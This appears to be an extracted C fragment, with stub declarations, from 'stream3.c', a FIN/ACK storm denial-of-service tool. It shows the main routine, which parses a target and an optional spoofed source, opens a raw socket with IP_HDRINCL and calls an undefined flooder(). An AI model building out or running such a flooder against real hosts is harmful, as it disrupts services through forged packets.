
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int on ;


 int IPPROTO_IP ;
 int IPPROTO_RAW ;
 int IP_HDRINCL ;
 int PF_INET ;
 int SOCK_RAW ;
 void* atoi (char*) ;
 void* dstaddr ;
 void* dstport ;
 int exit (int) ;
 int fflush (int ) ;
 int flooder () ;
 void* lookup (char*) ;
 int perror (char*) ;
 int printf (char*) ;
 scalar_t__ setsockopt (int ,int ,int ,char*,int) ;
 int sock ;
 int socket (int ,int ,int ) ;
 int srand (int ) ;
 void* srcaddr ;
 void* srcport ;
 int stdout ;
 int time (int *) ;
 int usage (char*) ;

int main(int argc, char *argv[])
{
    int on = 1;

    printf("stream3.c v0.1 - FIN/ACK Storm\n 3APA3A@security.nnov.ru\n");

    if (argc < 1) exit(-3);
    if (argc < 3 || argc > 5)
       usage(argv[0]);

    srand(time(((void*)0)));

    dstaddr = lookup(argv[1]);
    dstport = atoi(argv[2]);

    if (!dstaddr || !dstport) usage(argv[0]);

    if(argc > 3) srcaddr = lookup(argv[3]);
    if(argc > 4) srcport = atoi(argv[4]);

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket()");
       exit(-1);
    }

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
       perror("setsockopt()");
       exit(-2);
    }

    printf("Starting");
    fflush(stdout);

    flooder();

    return 0;
}
